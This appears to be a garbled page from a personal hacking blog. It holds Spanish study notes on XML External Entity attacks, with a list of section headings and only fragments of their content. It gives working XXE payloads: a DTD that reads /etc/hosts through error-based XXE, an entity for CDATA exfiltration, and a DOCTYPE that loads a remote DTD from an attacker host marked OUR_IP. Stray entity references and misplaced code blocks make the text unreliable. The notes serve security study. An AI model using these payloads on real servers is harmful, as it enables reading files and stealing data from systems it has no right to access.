Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

XXE (XML External Entity)

Identificando XXE

Payloads con SYSTEM

Payloads con DTD

Identificando XXE

RCE con XXE

Filtración con CDATA

&joined;

- Desde la maquina atacante tenemos que xxe: `<!ENTITY joined "%begin;%file;%end;">`

### Error based XXE
- Error based XXE es un ataque que se basa en la identificación de errores en la aplicación web.
- Por ejemplo, si una aplicación web permite la inclusión de archivos XML externas, un atacante podría utilizar un payload con DTD para ejecutar código en el servidor.
- Primero tenemos que ver de generar un error xml en la aplicación web.
- Luego podemos tener un DTD así:
```xml	
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Y podemos tener el siguiente payload en la petición

<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %error;
]>

Out of Band XXE (blind XXE)

&content;

```

XXE automatizado